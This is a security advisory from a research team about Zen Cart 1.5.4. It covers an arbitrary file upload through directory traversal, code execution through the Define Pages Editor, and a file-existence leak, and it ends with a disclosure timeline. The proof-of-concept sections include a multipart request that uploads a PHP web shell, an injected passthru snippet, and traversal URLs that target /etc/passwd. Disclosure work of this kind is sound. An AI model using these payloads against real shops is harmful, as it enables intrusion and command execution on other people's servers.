Zen Cart 1.5.4 - Code Execution and Information Leak

1. Zen Cart 1.5.4: Code Execution and Information Leak
2. Security Advisory – Curesec Research Team
3. 1. Introduction
4.  
5. Affected Product: Zen Cart 1.5.4
6. Fixed in: partial fix via patch
7. Partial Patch Link:
8. https://www.zen-cart.com/showthread.php?218239-curesec-security-report-Patch-Included
9.  
10. Vendor Contact: security@zen-cart.com
11. Vulnerability Type: Code Execution and Information Leak
12. Remote Exploitable: Yes
13. Reported to vendor: 08/13/2015
14. Disclosed to public: 09/14/2015
15. Release mode: Coordinated release
16. CVE: n/a
17. Credits Tim Coen of Curesec GmbH
18.  
19. 2. Vulnerability Description: Arbitrary File Upload
20.  
21. When uploading an image for a record, there is no check as to what type
22. or extension the file has, with the exception that it cannot be a
23. htaccess file. These files are stored in the /image directory, which is
24. protected from code execution via a htaccess file if the server is not
25. prevented from parsing htaccess files correctly (which may for example
26. be the case for speed and security reasons).
27.  
28. An attacker can perform a directory traversal via the img_dir POST
29. parameter to store an uploaded image outside of this protected
30. directory, thus gaining code execution or overwriting sensitive files,
31. even if the image directory is protected by the htaccess file.
32.  
33. The recommendations for denying code execution listed in the help-page
34. "Important Site Security Recommendations" - such as protecting the
35. /image and /html_includes folders against file modification and
36. execution - do not protect against code execution via this attack.
37.  
38. This problem exists for other classes performing file operations as
39. well, such as media_manager.php, manufacturers.php,
40. attributes_controller.php, mail.php, new_product_preview.php,
41. record_company.php, product_types.php, and categories.php.
42.  
43. Please note that an admin account is required that has the right to edit
44. one of the items that provide an image upload, such as the right
45. "Catalog: Product Types" or "Extra: Record Artists"
46. 3. Proof of Concept: Arbitrary File Upload
47.  
48.  
49. The request to upload a file may look like this:
50.  
51. POST
52. /zen-cart-v1.5.4-12302014/admin2/record_artists.php?page=1&mID=1&action=save
53. HTTP/1.1
54. Host: localhost
55.  
56. ----------1358192638
57. Content-Disposition: form-data; name="securityToken"
58.  
59. 30bb3768c3aa1120ccae02eca8ec8a4b
60. ----------1358192638
61. Content-Disposition: form-data; name="artists_name"
62.  
63. The Russ Tippins Band
64. ----------1358192638
65. Content-Disposition: form-data; name="artists_image";
66. filename="test.php"
67. Content-Type: application/x-php
68.  
69. <?php
70. passthru($_GET['x']);
71.  
72. ----------1358192638
73. Content-Disposition: form-data; name="img_dir"
74.  
75. dvd/../../
76. ----------1358192638
77. Content-Disposition: form-data; name="artists_url[1]"
78.  
79. www.russtippins.com/
80. ----------1358192638
81. Content-Disposition: form-data; name="x"
82.  
83. 37
84. ----------1358192638
85. Content-Disposition: form-data; name="y"
86.  
87. 9
88. ----------1358192638--
89.  
90. 4. Further
91. Code Execution
92.  
93. With an admin account with the right "Tools: Define Pages Editor" it is
94. possible to edit a limited number of PHP files which mainly contain HTML
95. here:
96. http://localhost/zen-cart-v1.5.4-12302014/admin2/define_pages_editor.php?define_it=4&action=new_page.
97.  
98. Execution of these files is prohibited via htaccess files, so with
99. correct server configuration, the intention seems to be that an attacker
100. should not be able to gain code execution via this editor.
101.  
102. However, the protection against code execution is insufficient, as any
103. injected code will be executed once the file is included. For example:
104.  
105. visit
106. http://localhost/zen-cart-v1.5.4-12302014/admin2/define_pages_editor.php?define_it=8&action=new_page
107. add <?php passthru($_GET['e']); ?>
108. visit
109. http://localhost/zen-cart-v1.5.4-12302014/index.php?main_page=nonexistent&cPath=2&e=ls%20-alF
110.  
111. Please note that if the user followed the guide "Important Site Security
112. Recommendations", they will have set these files to read-only,
113. disallowing code execution.
114. Information Leak
115.  
116. Via a directory traversal on the products_image_large_additional
117. parameter, an attacker can check if a file exists on the server, thus
118. gaining information about installed software. Viewing of the file is not
119. possible.
120.  
121. Example:
122.  
123.  
124. http://localhost/zen-cart-v1.5.4-12302014/index.php?main_page=popup_image_additional&pID=26&pic=1&products_image_large_additional=../../../../../../../etc/passwd
125. results in
126. <a href="javascript:window.close()"><img
127. src="../../../../../../../etc/passwd"
128.  
129.  
130. http://localhost/zen-cart-v1.5.4-12302014/index.php?main_page=popup_image_additional&pID=26&pic=1&products_image_large_additional=../../../../../../../etc/passwd2
131. results in default image being shown
132.  
133. 5. Solution
134.  
135. To mitigate the information leak a patch can be used:
136. https://www.zen-cart.com/showthread.php?218239-curesec-security-report-Patch-Included
137.  
138. The Arbitrary File Upload vulnerability has not been fixed yet.
139.  
140. 6. Report Timeline
141.  
142. 08/13/2015 Informed Vendor about Issue
143. 09/12/2015 Vendor releases report and partial fix
144. 09/14/2015 Disclosed to public
145.  
146. 7. Blog Reference:
147. http://blog.curesec.com/article/blog/Zen-Cart-154-Code-Execution-and-Information-Leak-54.html